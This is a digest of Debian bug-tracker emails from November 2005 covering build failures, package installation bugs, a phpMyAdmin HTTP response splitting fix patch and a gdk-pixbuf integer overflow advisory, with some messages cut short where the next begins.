Your message dated Wed, 16 Nov 2005 06:32:15 -0800 with message-id [EMAIL PROTECTED] and subject line Bug#337442: fixed in php-simpletest 1.0.0-3 has caused the attached Bug report to be marked as done. This means that you claim that the problem has been dealt with. If this is not the case it is now your responsibility to reopen the Bug report if necessary, and/or fix the problem forthwith. (NB: If you are a system administrator and have no idea what I am talking about this indicates a serious mail system misconfiguration somewhere. Please contact me immediately.) Debian bug tracking system administrator (administrator, Debian Bugs database) -- Received: (at submit) by bugs.debian.org; 4 Nov 2005 12:12:14 + From [EMAIL PROTECTED] Fri Nov 04 04:12:14 2005 Return-path: [EMAIL PROTECTED] Received: from srv-smtp.math.univ-rennes1.fr [129.20.36.164] by spohr.debian.org with esmtp (Exim 3.36 1 (Debian)) id 1EY0QY-0007Ap-00; Fri, 04 Nov 2005 04:12:14 -0800 Received: from frobnitz.homelinux.net (dyn37033.math.univ-rennes1.fr [129.20.37.33]) by srv-smtp.math.univ-rennes1.fr (Postfix) with ESMTP id 60145B887 for [EMAIL PROTECTED]; Fri, 4 Nov 2005 13:11:43 +0100 (CET) Received: from daniel by frobnitz.homelinux.net with local (Exim 4.54) id 1EY0Q3-8O-Bv for [EMAIL PROTECTED]; Fri, 04 Nov 2005 13:11:43 +0100 From: Daniel Schepler [EMAIL PROTECTED] To: Debian Bug Tracking System [EMAIL PROTECTED] Subject: php-simpletest: FTBFS: Can't rm -*/package.xml Message-Id: [EMAIL PROTECTED] Date: Fri, 04 Nov 2005 13:11:43 +0100 Delivered-To: [EMAIL PROTECTED] X-Spam-Checker-Version: SpamAssassin 2.60-bugs.debian.org_2005_01_02 (1.212-2003-09-23-exp) on spohr.debian.org X-Spam-Level: X-Spam-Status: No, hits=-7.0 required=4.0 tests=BAYES_00,HAS_PACKAGE, HTML_10_20 autolearn=no version=2.60-bugs.debian.org_2005_01_02 Package: php-simpletest Severity: serious Version: 1.0.0-2 From my pbuilder build log: ... fakeroot debian/rules clean dpkg-parsechangelog: warning: no utmp entry available and LOGNAME not defined; using uid of process (0) debian: warning: no utmp entry available and LOGNAME not defined; using uid of process (0) dpkg-parsechangelog: warning: no utmp entry available and LOGNAME not defined; using uid of process (0) debian: warning: no utmp entry available and LOGNAME not defined; using uid of process (0) 500 Can't connect to pear.php.net:80 (Bad protocol 'tcp') http://pear.php.net/dtd/package-1.0 Handler couldn't resolve external entity at line 2, column 62, byte 107 error in processing external entity reference at line 2, column 62, byte 107: ?xml version=1.0 encoding=ISO-8859-1 ? !DOCTYPE package SYSTEM http://pear.php.net/dtd/package-1.0; =^ package version=1.0 packagerversion=1.4.0a12 namesimpletest/name at /usr/lib/perl5/XML/Parser.pm line 187 500 Can't connect to pear.php.net:80 (Bad protocol 'tcp') http://pear.php.net/dtd/package-1.0 Handler couldn't resolve external entity at line 2, column 62, byte 107 error in processing external entity reference at line 2, column 62, byte 107: ?xml version=1.0 encoding=ISO-8859-1 ? !DOCTYPE package SYSTEM http://pear.php.net/dtd/package-1.0; =^ package version=1.0 packagerversion=1.4.0a12 namesimpletest/name at /usr/lib/perl5/XML/Parser.pm line 187 test -x debian/rules test `id -u` = 0 if test -n test != .; then rmdir ; fi if test . != .; then rmdir .; fi dh_clean rm -f -*/package.xml rm: invalid option -- * Try `rm --help' for more information. make: *** [clean] Error 1 -- System Information: Debian Release: testing/unstable APT prefers unstable APT policy: (500, 'unstable'), (1, 'experimental') Architecture: i386 (i686) Shell: /bin/sh linked to /bin/bash Kernel: Linux 2.6.14-1-686 Locale: LANG=fr_FR.UTF-8, LC_CTYPE=fr_FR.UTF-8 (charmap=UTF-8) --- Received: (at 337442-close) by bugs.debian.org; 16 Nov 2005 14:41:27 + From [EMAIL PROTECTED] Wed Nov 16 06:41:27 2005 Return-path: [EMAIL PROTECTED] Received: from katie by spohr.debian.org with local (Exim 4.50) id 1EcOKd-0004Sp-Ng; Wed, 16 Nov 2005 06:32:15 -0800 From: Charles Fry [EMAIL PROTECTED] To: [EMAIL PROTECTED] X-Katie: $Revision: 1.56 $ Subject: Bug#337442: fixed in php-simpletest 1.0.0-3 Message-Id: [EMAIL PROTECTED] Sender: Archive Administrator [EMAIL PROTECTED] Date: Wed, 16 Nov 2005 06:32:15 -0800 X-Spam-Checker-Version: SpamAssassin 2.60-bugs.debian.org_2005_01_02 (1.212-2003-09-23-exp) on spohr.debian.org X-Spam-Level: X-Spam-Status: No, hits=-6.0 required=4.0 tests=BAYES_00,HAS_BUG_NUMBER autolearn=no version=2.60-bugs.debian.org_2005_01_02 Source: php-simpletest Source-Version: 1.0.0-3 We believe that the bug you reported is fixed in the latest version of php-simpletest, which is
Bug#337584: alternatives
Well, in order to get my RC bugs closed, I temmporarily switched to xmlstarlet. Nonetheless, I do believe that this is a serious issue that should be addressed. There is no reason that I can come up with that a computer without a network connection should be prevented from running xpath on a local xml document. Charles -- No man can really Do his stuff With a face that's sore Or a chin That's rough Burma-Shave http://burma-shave.org/jingles/1945/no_man_can signature.asc Description: Digital signature
Bug#335881: Bug cause
This bug is caused by a change in GAS which makes it prefer shorter instruction sequences: 80580c1: 8d 14 52lea(%edx,%edx,2),%edx 80580c4: 8d ac 95 17 00 00 00lea0x17(%ebp,%edx,4),%ebp 80580cb: 89 c2 mov%eax,%edx 80580cd: ff e5 jmp*%ebp 80580cf: 90 nop 80580d0: 13 44 8b fc adc0xfffc(%ebx,%ecx,4),%eax 80580d4: 8b 14 8emov(%esi,%ecx,4),%edx 80580d7: 89 44 8f fc mov%eax,0xfffc(%edi,%ecx,4) 80580db: 13 14 8badc(%ebx,%ecx,4),%edx 80580de: 8b 44 8e 04 mov0x4(%esi,%ecx,4),%eax 80580e2: 89 14 8fmov%edx,(%edi,%ecx,4) 80580e5: 13 44 8b 04 adc0x4(%ebx,%ecx,4),%eax 80580e9: 8b 54 8e 08 mov0x8(%esi,%ecx,4),%edx 80580ed: 89 44 8f 04 mov%eax,0x4(%edi,%ecx,4) 80580f1: 13 54 8b 08 adc0x8(%ebx,%ecx,4),%edx 80580f5: 8b 44 8e 0c mov0xc(%esi,%ecx,4),%eax 80580f9: 89 54 8f 08 mov%edx,0x8(%edi,%ecx,4) 80580fd: 13 44 8b 0c adc0xc(%ebx,%ecx,4),%eax Corresponding hand-written assembler source code: leal (%edx,%edx,2), %edx # ebp - L(begin) + 12*reste leal L(begin)-L(here)(%ebp,%edx,4), %ebp movl %eax,%edx jmp*%ebp # corps de boucle à dérouler. taille du code = 24 octets # entrer avec eax = edx = 1er chiffre de a, CF = 0 #undef BODY #define BODY(x,y,z) \ adcl x(%ebx,%ecx,4), %eax; \ movl y(%esi,%ecx,4), %edx; \ movl %eax, x(%edi,%ecx,4); \ adcl y(%ebx,%ecx,4), %edx; \ movl z(%esi,%ecx,4), %eax; \ movl %edx, y(%edi,%ecx,4) # boucle d addition déroulée pour 16 chiffres ALIGN(4) L(begin): BODY(-4,0,4); BODY(4,8,12); BODY(12,16,20); BODY(20,24,28) BODY(28,32,36); BODY(36,40,44); BODY(44,48,52); BODY(52,56,60) The first few instruction bundles are not 12 bytes long, as required, but 11 bytes, with catastrophic consequences. I will see what can be done about this. Technically, this is not a GAS bug.
Bug#339424: marked as done (pygmy: FTBFS: Missing Build-Depends on 'python-dev')
Your message dated Wed, 16 Nov 2005 07:47:08 -0800 with message-id [EMAIL PROTECTED] and subject line Bug#339424: fixed in pygmy 0.45+svn77-3 has caused the attached Bug report to be marked as done. This means that you claim that the problem has been dealt with. If this is not the case it is now your responsibility to reopen the Bug report if necessary, and/or fix the problem forthwith. (NB: If you are a system administrator and have no idea what I am talking about this indicates a serious mail system misconfiguration somewhere. Please contact me immediately.) Debian bug tracking system administrator (administrator, Debian Bugs database) -- Received: (at submit) by bugs.debian.org; 16 Nov 2005 08:01:57 + From [EMAIL PROTECTED] Wed Nov 16 00:01:57 2005 Return-path: [EMAIL PROTECTED] Received: from e182064214.adsl.alicedsl.de ([85.182.64.214] helo=kat.ainf.net) by spohr.debian.org with esmtp (Exim 4.50) id 1EcIEv-000736-Dc for [EMAIL PROTECTED]; Wed, 16 Nov 2005 00:01:57 -0800 Received: from aj by kat.ainf.net with local (Exim 4.54) id 1EcIEM-0001pR-Ap; Wed, 16 Nov 2005 09:01:22 +0100 To: Debian Bug Tracking System [EMAIL PROTECTED] From: Andreas Jochens [EMAIL PROTECTED] Subject: pygmy: FTBFS: Missing Build-Depends on 'python-dev' Message-Id: [EMAIL PROTECTED] Date: Wed, 16 Nov 2005 09:01:22 +0100 Delivered-To: [EMAIL PROTECTED] X-Spam-Checker-Version: SpamAssassin 2.60-bugs.debian.org_2005_01_02 (1.212-2003-09-23-exp) on spohr.debian.org X-Spam-Level: X-Spam-Status: No, hits=-8.0 required=4.0 tests=BAYES_00,HAS_PACKAGE autolearn=no version=2.60-bugs.debian.org_2005_01_02 Package: pygmy Version: 0.45+svn77-2 Severity: serious Tags: patch When building 'pygmy' in a clean 'unstable' chroot, I get the following error: dh_testroot # Add here commands to clean up after the build process. python setup.py clean --all make: python: Command not found make: *** [clean] Error 127 Please add the missing Build-Depends on 'python-dev' to debian/control. Regards Andreas Jochens diff -urN ../tmp-orig/pygmy-0.45+svn77/debian/control ./debian/control --- ../tmp-orig/pygmy-0.45+svn77/debian/control 2005-11-16 07:53:43.0 + +++ ./debian/control2005-11-16 07:53:41.0 + @@ -2,7 +2,7 @@ Section: sound Priority: optional Maintainer: Decklin Foster [EMAIL PROTECTED] -Build-Depends-Indep: debhelper (= 4.0.0), python2.3 +Build-Depends-Indep: debhelper, python-dev, python2.3 Standards-Version: 3.6.2 Package: pygmy --- Received: (at 339424-close) by bugs.debian.org; 16 Nov 2005 15:51:25 + From [EMAIL PROTECTED] Wed Nov 16 07:51:25 2005 Return-path: [EMAIL PROTECTED] Received: from katie by spohr.debian.org with local (Exim 4.50) id 1EcPV6-0003JJ-St; Wed, 16 Nov 2005 07:47:08 -0800 From: Decklin Foster [EMAIL PROTECTED] To: [EMAIL PROTECTED] X-Katie: $Revision: 1.56 $ Subject: Bug#339424: fixed in pygmy 0.45+svn77-3 Message-Id: [EMAIL PROTECTED] Sender: Archive Administrator [EMAIL PROTECTED] Date: Wed, 16 Nov 2005 07:47:08 -0800 X-Spam-Checker-Version: SpamAssassin 2.60-bugs.debian.org_2005_01_02 (1.212-2003-09-23-exp) on spohr.debian.org X-Spam-Level: X-Spam-Status: No, hits=-6.0 required=4.0 tests=BAYES_00,HAS_BUG_NUMBER autolearn=no version=2.60-bugs.debian.org_2005_01_02 Source: pygmy Source-Version: 0.45+svn77-3 We believe that the bug you reported is fixed in the latest version of pygmy, which is due to be installed in the Debian FTP archive: pygmy_0.45+svn77-3.diff.gz to pool/main/p/pygmy/pygmy_0.45+svn77-3.diff.gz pygmy_0.45+svn77-3.dsc to pool/main/p/pygmy/pygmy_0.45+svn77-3.dsc pygmy_0.45+svn77-3_all.deb to pool/main/p/pygmy/pygmy_0.45+svn77-3_all.deb A summary of the changes between this version and the previous one is attached. Thank you for reporting the bug, which will now be closed. If you have further comments please address them to [EMAIL PROTECTED], and the maintainer will reopen the bug report if appropriate. Debian distribution maintenance software pp. Decklin Foster [EMAIL PROTECTED] (supplier of updated pygmy package) (This message was generated automatically at their request; if you believe that there is a problem with it please contact the archive administrators by mailing [EMAIL PROTECTED]) -BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Format: 1.7 Date: Wed, 16 Nov 2005 10:28:52 -0500 Source: pygmy Binary: pygmy Architecture: source all Version: 0.45+svn77-3 Distribution: unstable Urgency: low Maintainer: Decklin Foster [EMAIL PROTECTED] Changed-By: Decklin Foster [EMAIL PROTECTED] Description: pygmy - PyGTK client for the Music Player Daemon (MPD) Closes: 339424 Changes: pygmy (0.45+svn77-3) unstable; urgency=low . * Need python-dev for distutils (Closes: #339424) Files: 56fa0c810e49dbafbb7a57aa3a3df462 600 sound optional pygmy_0.45+svn77-3.dsc
Bug#339480: security patch in 4.0.1-2 breaks tkdiff
Package: tkdiff Version: 1:4.0.2-2 Severity: grave For every subversion file I try to tkdiff, I get the following error: Error in startup script: can not find channel named fid while executing close fid (procedure tmpfile line 11) invoked from within tmpfile $index (procedure get-file-rev line 30) invoked from within get-file-rev $f 1 (procedure init-files line 149) invoked from within init-files (procedure check-error line 22) invoked from within check-error $result $output (procedure do-new-diff line 23) invoked from within do-new-diff (eval body line 1) invoked from within eval do-new-diff (procedure main line 56) invoked from within main (file /usr/bin/tkdiff line 10332) Investigation shows that the channel (variable?) fid was introduced in the tempfile security patch for 4.0.1-2. -- System Information: Debian Release: testing/unstable APT prefers unstable APT policy: (500, 'unstable') Architecture: i386 (i686) Shell: /bin/sh linked to /bin/bash Kernel: Linux 2.6.11-1-686-smp Locale: LANG=en_CA, LC_CTYPE=en_CA (charmap=ISO-8859-1) Versions of packages tkdiff depends on: ii tk8.4 8.4.11-1 Tk toolkit for Tcl and X11, v8.4 - tkdiff recommends no packages. -- no debconf information -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Processed: please
Processing commands for [EMAIL PROTECTED]: merge 323112 332534 Bug#323112: heaplayer: ftbfs [sparc] there are no arguments to 'setTidMap' that depend on a template parameter Bug#332534: heaplayers_3.2.2-2 (unstable): fails to build Merged 323112 332534. thanks Stopping processing here. Please contact me if you need assistance. Debian bug tracking system administrator (administrator, Debian Bugs database) -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Bug#339485: kernel-image-2.6.8-powerpc: Installation fails in half-installed state, can neither install nor remove
Package: kernel-image-2.6.8-powerpc Version: 2.6.8-12 Severity: serious Justification: Policy 10.7.3 kernel-image-bug -- System Information: Debian Release: testing/unstable APT prefers testing APT policy: (1001, 'testing'), (990, 'stable') Architecture: powerpc (ppc) Shell: /bin/sh linked to /bin/bash Kernel: Linux 2.4.17rich1 Locale: LANG=C, LC_CTYPE=C (charmap=ANSI_X3.4-1968) Versions of packages kernel-image-2.6.8-powerpc depends on: ii initrd-tools 0.1.84 tools to create initrd image for p ii mkvmlinuz 15 create a kernel to boot a PowerPC ii module-init-tools 3.2-pre9-2 tools for managing Linux kernel mo Versions of packages kernel-image-2.6.8-powerpc recommends: pn hotplug none (no description available) -- no debconf information -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Bug#339487: kernel-image-2.6.8-powerpc: Installation fails in half-installed state; can neither install nor remove
Package: kernel-image-2.6.8-powerpc Version: 2.6.8-12 Severity: serious Justification: Policy 10.7.3 Post-removal script fails reporting Not a directory: --verbose (or '-v'). kernel-image-2.6.8-powerpc is left stuck in a half-installed state and can not be installed, removed, or upgraded via apt-get or dpkg. The process of installing, upgrading and removing _other_ packages is also affected since every iteration of apt-get fails while trying to process kernel-image_2.6.8-powerpc, as does apt-get install -f. An attempt to install kernel-image-2.6-powerpc exhibited the same symptom, as does apt-get install --reinstall kernel-image-2.6.8-powerpc System state is reflected in the following traces: cmd: dpkg -l kernel-image* Desired=Unknown/Install/Remove/Purge/Hold | Status=Not/Installed/Config-files/Unpacked/Failed-config/Half-installed |/ Err?=(none)/Hold/Reinst-required/X=both-problems (Status,Err: uppercase=bad) ||/ Name VersionDescription +++-==-==- un kernel-image none (no description available) un kernel-image-2 none (no description available) iU kernel-image-2 2.6.12-10 Linux kernel 2.6 image on powerpc-class mach iHR kernel-image-2 2.6.8-12 Linux kernel image for 2.6.8-powerpc cmd: dpkg -l *powerpc Desired=Unknown/Install/Remove/Purge/Hold | Status=Not/Installed/Config-files/Unpacked/Failed-config/Half-installed |/ Err?=(none)/Hold/Reinst-required/X=both-problems (Status,Err: uppercase=bad) ||/ Name VersionDescription +++-==-==- iU kernel-image-2 2.6.12-10 Linux kernel 2.6 image on powerpc-class mach iHR kernel-image-2 2.6.8-12 Linux kernel image for 2.6.8-powerpc iU linux-image-2. 2.6.12-10 Linux kernel 2.6 image on powerpc-class mach iHR linux-image-2. 2.6.12-10 Linux kernel 2.6.12 image on powerpc-class m cmd: apt-get install -f Reading package lists... Done Building dependency tree... Done The following extra packages will be installed: kernel-image-2.6.8-powerpc Recommended packages: hotplug The following packages will be upgraded: kernel-image-2.6.8-powerpc 1 upgraded, 0 newly installed, 0 to remove and 12 not upgraded. 4 not fully installed or removed. Need to get 0B/28.1MB of archives. After unpacking 274kB disk space will be freed. Do you want to continue [Y/n]? y (Reading database ... 88449 files and directories currently installed.) Preparing to replace linux-image-2.6.12-1-powerpc 2.6.12-10 (using .../linux-image-2.6.12-1-powerpc_2.6.12-10_powerpc.deb) ... Unpacking replacement linux-image-2.6.12-1-powerpc ... Not a directory: --verbose Failed to process /etc/kernel/postrm.d at /var/lib/dpkg/info/linux-image-2.6.12-1-powerpc.postrm line 270. dpkg: warning - old post-removal script returned error exit status 2 dpkg - trying script from the new package instead ... Not a directory: --verbose Failed to process /etc/kernel/postrm.d at /var/lib/dpkg/tmp.ci/postrm line 270. dpkg: error processing /var/cache/apt/archives/linux-image-2.6.12-1-powerpc_2.6.12-10_powerpc.deb (--unpack): subprocess new post-removal script returned error exit status 2 Not a directory: --verbose Failed to process /etc/kernel/postrm.d at /var/lib/dpkg/tmp.ci/postrm line 270. dpkg: error while cleaning up: subprocess post-removal script returned error exit status 2 Preparing to replace kernel-image-2.6.8-powerpc 2.6.8-12 (using .../kernel-image-2.6.8-powerpc_2.6.8-16_powerpc.deb) ... The directory /lib/modules/2.6.8-powerpc still exists. Continuing as directed. Unpacking replacement kernel-image-2.6.8-powerpc ... Not a directory: -v Failed to process /etc/kernel/postrm.d at /var/lib/dpkg/info/kernel-image-2.6.8-powerpc.postrm line 250. dpkg: warning - old post-removal script returned error exit status 2 dpkg - trying script from the new package instead ... Not a directory: --verbose Failed to process /etc/kernel/postrm.d at /var/lib/dpkg/tmp.ci/postrm line 250. dpkg: error processing /var/cache/apt/archives/kernel-image-2.6.8-powerpc_2.6.8-16_powerpc.deb (--unpack): subprocess new post-removal script returned error exit status 2 Not a directory: --verbose Failed to process /etc/kernel/postrm.d at /var/lib/dpkg/tmp.ci/postrm line 250. dpkg: error while cleaning up: subprocess post-removal script returned error exit status 2 Errors were encountered while processing: /var/cache/apt/archives/linux-image-2.6.12-1-powerpc_2.6.12-10_powerpc.deb /var/cache/apt/archives/kernel-image-2.6.8-powerpc_2.6.8-16_powerpc.deb E: Sub-process /usr/bin/dpkg returned an error code (1) cmd: apt-get remove kernel-image-2.6.8-powerpc Reading package lists... Done Building dependency tree... Done The following packages will be REMOVED: kernel-image-2.6.8-powerpc 0 upgraded, 0 newly installed, 1 to remove and 12 not upgraded. 4 not fully installed or removed. Need to get 0B/14.6MB of
Bug#339488: apt-src: Needs to install build-deps before clean
Package: apt-src Version: 0.25.1 Severity: serious Justification: Policy 7.6 Quoting Policy 7.6: Build-Depends, Build-Conflicts The Build-Depends and Build-Conflicts fields must be satisfied when any of the following targets is invoked: build, clean, binary, binary-arch, build-arch, build-indep and binary-indep. Failing to do so causes problems: $ apt-src upgrade I: Upgrading /home/anthony/apt-src/yaird-0.0.11 .. I: Cleaning in /home/anthony/apt-src/local-yaird-0.0.11 .. debian/rules:11: /usr/share/cdbs/1/rules/debhelper.mk: No such file or directory debian/rules:12: /usr/share/cdbs/1/class/autotools.mk: No such file or directory /usr/share/cdbs/1/rules/patchsys-quilt.mk:38: /usr/share/cdbs/1/rules/buildcore.mk: No such file or directory debian/cdbs/1/rules/buildinfo.mk:29: /usr/share/cdbs/1/rules/buildcore.mk: No such file or directory make: *** No rule to make target `/usr/share/cdbs/1/rules/buildcore.mk'. Stop. E: Cleaning failed -- System Information: Debian Release: 3.1 APT prefers unstable APT policy: (99, 'unstable') Architecture: i386 (i686) Kernel: Linux 2.6.14-1-686-smp Locale: LANG=en_US.UTF-8, LC_CTYPE=en_US.UTF-8 (charmap=UTF-8) Versions of packages apt-src depends on: ii apt 0.5.28.6 Advanced front-end for dpkg ii dpkg-dev 1.10.28Package building tools for Debian ii libapt-pkg-perl 0.1.13 Perl interface to libapt-pkg ii perl 5.8.4-8Larry Wall's Practical Extraction -- no debconf information -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Bug#339048: (no subject)
Works perfect. Thanks for your work, Daniel. John -- Powered by the Penguin -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Bug#339437: PMASA-2005-6 when register_globals = on
Dnia Wednesday 16 of November 2005 13:17, Martin Schulze napisał: Vuln 1: Full Path Disclosures in the following files: Vuln 2: Http Response Splitting in libraries/header_http.inc.php Do you know if this is the same vulnerability as the first one above? The Full Path Disclosure is not fixed currently by upstream and I think it is not important for Debian version. I'm attaching the patch for sarge. Additionaly, I've fixed the important bug #324318. Please, include the patch for this bug to stable release. The patch doesn't change program functionality and resolve more problems with bad configration file which are not reported to BTS. -- .''`.Piotr Roszatycki, Netia SA : :' :mailto:[EMAIL PROTECTED] `. `' mailto:[EMAIL PROTECTED] `- === debian/changelog == --- debian/changelog (revision 373) +++ debian/changelog (local) @@ -1,3 +1,19 @@ +phpmyadmin (4:2.6.2-3sarge2) stable-security; urgency=high + + * Security fix: HTTP Response Splitting vulnerability. +See: http://www.phpmyadmin.net/home_page/security.php?issue=PMASA-2005-6 +See: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3621 +Closes: #339437. + + * New 104-bug_PMASA-2005-6.patch: +- Fixes HTTP Response Splitting vulnerability. + * New 105-bug_debian_324318.patch: +- Always set the default configuration values, even if the config.inc.php + file seems to be up to date. This fix allows to utilise more than three + databases. Closes: #324318. + + -- Piotr Roszatycki [EMAIL PROTECTED] Wed, 16 Nov 2005 17:49:13 +0100 + phpmyadmin (4:2.6.2-3sarge1) stable-security; urgency=high * NMU by security team to fix several vulnerabilities. Patch provided === debian/patches/104-bug_PMASA-2005-6.patch == --- debian/patches/104-bug_PMASA-2005-6.patch (revision 373) +++ debian/patches/104-bug_PMASA-2005-6.patch (local) @@ -0,0 +1,79 @@ +diff -Nru phpMyAdmin-2.6.4-pl3/libraries/db_table_exists.lib.php phpMyAdmin-2.6.4-pl4/libraries/db_table_exists.lib.php +--- phpMyAdmin-2.6.4-pl3/libraries/db_table_exists.lib.php 2004-10-19 21:51:54.0 +0200 phpMyAdmin-2.6.4-pl4/libraries/db_table_exists.lib.php 2005-11-15 16:21:47.0 +0100 +@@ -12,7 +12,7 @@ + $is_db = @PMA_DBI_select_db($db); + } + if (empty($db) || !$is_db) { +-if (!isset($is_transformation_wrapper)) { ++if (!defined('IS_TRANSFORMATION_WRAPPER')) { + PMA_sendHeaderLocation($cfg['PmaAbsoluteUri'] . 'main.php?' . PMA_generate_common_url('', '', '') . (isset($message) ? 'message=' . urlencode($message) : '') . 'reload=1'); + } + exit; +@@ -26,7 +26,7 @@ + if (empty($table) + || !($is_table @PMA_DBI_num_rows($is_table))) { + $redirect = TRUE; +-if (!isset($is_transformation_wrapper)) { ++if (!defined('IS_TRANSFORMATION_WRAPPER')) { + $redirect = TRUE; + if (!empty($table)) { + PMA_DBI_free_result($is_table); +diff -Nru phpMyAdmin-2.6.4-pl3/libraries/header_http.inc.php phpMyAdmin-2.6.4-pl4/libraries/header_http.inc.php +--- phpMyAdmin-2.6.4-pl3/libraries/header_http.inc.php 2004-04-27 14:36:11.0 +0200 phpMyAdmin-2.6.4-pl4/libraries/header_http.inc.php 2005-11-15 16:21:47.0 +0100 +@@ -5,19 +5,13 @@ + /** + * Sends http headers + */ +-// Don't use cache (required for Opera) +-$ctype = (isset($ctype) ? $ctype : 'html'); +-if ($ctype == 'css') { +-header('Content-Type: text/css; charset=ISO-8859-1'); +-} else { +-$GLOBALS['now'] = gmdate('D, d M Y H:i:s') . ' GMT'; +-header('Expires: ' . $GLOBALS['now']); // rfc2616 - Section 14.21 +-header('Last-Modified: ' . $GLOBALS['now']); +-header('Cache-Control: no-store, no-cache, must-revalidate, pre-check=0, post-check=0, max-age=0'); // HTTP/1.1 +-header('Pragma: no-cache'); // HTTP/1.0 +-if (!isset($is_transformation_wrapper)) { +-// Define the charset to be used +-header('Content-Type: text/' . $ctype . '; charset=' . $GLOBALS['charset']); +-} ++$GLOBALS['now'] = gmdate('D, d M Y H:i:s') . ' GMT'; ++header('Expires: ' . $GLOBALS['now']); // rfc2616 - Section 14.21 ++header('Last-Modified: ' . $GLOBALS['now']); ++header('Cache-Control: no-store, no-cache, must-revalidate, pre-check=0, post-check=0, max-age=0'); // HTTP/1.1 ++header('Pragma: no-cache'); // HTTP/1.0 ++if (!defined('IS_TRANSFORMATION_WRAPPER')) { ++// Define the charset to be used ++header('Content-Type: text/html; charset=' . $GLOBALS['charset']); + } + ? +diff -Nru phpMyAdmin-2.6.4-pl3/css/phpmyadmin.css.php phpMyAdmin-2.6.4-pl4/css/phpmyadmin.css.php +--- phpMyAdmin-2.6.4-pl3/css/phpmyadmin.css.php 2005-08-16 19:49:57.0 +0200 phpMyAdmin-2.6.4-pl4/css/phpmyadmin.css.php 2005-11-15 16:21:47.0 +0100 +@@ -13,8 +13,8 @@ + // but only functions used to
Bug#339485:
This should be merged with 339487 (typed --body option rather than --body-file) -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Bug#339431: marked as done (CVE-2005-3186: Integer overflow in gdk-pixbuf's XPM code)
Your message dated Wed, 16 Nov 2005 09:17:08 -0800 with message-id [EMAIL PROTECTED] and subject line Bug#339431: fixed in gtk+2.0 2.6.10-2 has caused the attached Bug report to be marked as done. This means that you claim that the problem has been dealt with. If this is not the case it is now your responsibility to reopen the Bug report if necessary, and/or fix the problem forthwith. (NB: If you are a system administrator and have no idea what I am talking about this indicates a serious mail system misconfiguration somewhere. Please contact me immediately.) Debian bug tracking system administrator (administrator, Debian Bugs database) -- Received: (at submit) by bugs.debian.org; 16 Nov 2005 09:17:36 + From [EMAIL PROTECTED] Wed Nov 16 01:17:36 2005 Return-path: [EMAIL PROTECTED] Received: from inutil.org ([193.22.164.111] helo=vserver151.vserver151.serverflex.de) by spohr.debian.org with esmtp (Exim 4.50) id 1EcJQ7-0006Do-Pd for [EMAIL PROTECTED]; Wed, 16 Nov 2005 01:17:35 -0800 Received: from wlan-client-004.informatik.uni-bremen.de ([134.102.116.5] helo=localhost.localdomain) by vserver151.vserver151.serverflex.de with esmtpsa (TLS-1.0:RSA_AES_256_CBC_SHA:32) (Exim 4.50) id 1EcJQ4-0006J7-RE for [EMAIL PROTECTED]; Wed, 16 Nov 2005 10:17:32 +0100 Received: from jmm by localhost.localdomain with local (Exim 4.54) id 1EcJPw-0001PW-KK; Wed, 16 Nov 2005 10:17:24 +0100 Content-Type: text/plain; charset=us-ascii MIME-Version: 1.0 Content-Transfer-Encoding: 7bit From: Moritz Muehlenhoff [EMAIL PROTECTED] To: Debian Bug Tracking System [EMAIL PROTECTED] Subject: CVE-2005-3186: Integer overflow in gdk-pixbuf's XPM code X-Mailer: reportbug 3.17 Date: Wed, 16 Nov 2005 10:17:24 +0100 X-Debbugs-Cc: Debian Security Team [EMAIL PROTECTED] Message-Id: [EMAIL PROTECTED] X-SA-Exim-Connect-IP: 134.102.116.5 X-SA-Exim-Mail-From: [EMAIL PROTECTED] X-SA-Exim-Scanned: No (on vserver151.vserver151.serverflex.de); SAEximRunCond expanded to false Delivered-To: [EMAIL PROTECTED] X-Spam-Checker-Version: SpamAssassin 2.60-bugs.debian.org_2005_01_02 (1.212-2003-09-23-exp) on spohr.debian.org X-Spam-Level: X-Spam-Status: No, hits=-11.0 required=4.0 tests=BAYES_00,HAS_PACKAGE, X_DEBBUGS_CC autolearn=ham version=2.60-bugs.debian.org_2005_01_02 Package: gtk+2.0 Severity: grave Tags: security Justification: user security hole An integer overflow in gdk-pixbuf's XPM rendering code can be exploited to overwrite the heap and exploit arbitrary code through crafted images. Please see www.idefense.com/application/poi/display?id=339type=vulnerabilities for more details. Cheers, Moritz -- System Information: Debian Release: testing/unstable APT prefers unstable APT policy: (500, 'unstable') Architecture: i386 (i686) Shell: /bin/sh linked to /bin/bash Kernel: Linux 2.6.14-1-686 Locale: LANG=C, [EMAIL PROTECTED] (charmap=ISO-8859-15) --- Received: (at 339431-close) by bugs.debian.org; 16 Nov 2005 17:21:32 + From [EMAIL PROTECTED] Wed Nov 16 09:21:32 2005 Return-path: [EMAIL PROTECTED] Received: from katie by spohr.debian.org with local (Exim 4.50) id 1EcQuC-0002HP-6m; Wed, 16 Nov 2005 09:17:08 -0800 From: Sebastien Bacher [EMAIL PROTECTED] To: [EMAIL PROTECTED] X-Katie: $Revision: 1.56 $ Subject: Bug#339431: fixed in gtk+2.0 2.6.10-2 Message-Id: [EMAIL PROTECTED] Sender: Archive Administrator [EMAIL PROTECTED] Date: Wed, 16 Nov 2005 09:17:08 -0800 X-Spam-Checker-Version: SpamAssassin 2.60-bugs.debian.org_2005_01_02 (1.212-2003-09-23-exp) on spohr.debian.org X-Spam-Level: X-Spam-Status: No, hits=-4.8 required=4.0 tests=BAYES_00,FROM_ENDS_IN_NUMS, HAS_BUG_NUMBER autolearn=no version=2.60-bugs.debian.org_2005_01_02 X-CrossAssassin-Score: 4 Source: gtk+2.0 Source-Version: 2.6.10-2 We believe that the bug you reported is fixed in the latest version of gtk+2.0, which is due to be installed in the Debian FTP archive: gtk+2.0_2.6.10-2.diff.gz to pool/main/g/gtk+2.0/gtk+2.0_2.6.10-2.diff.gz gtk+2.0_2.6.10-2.dsc to 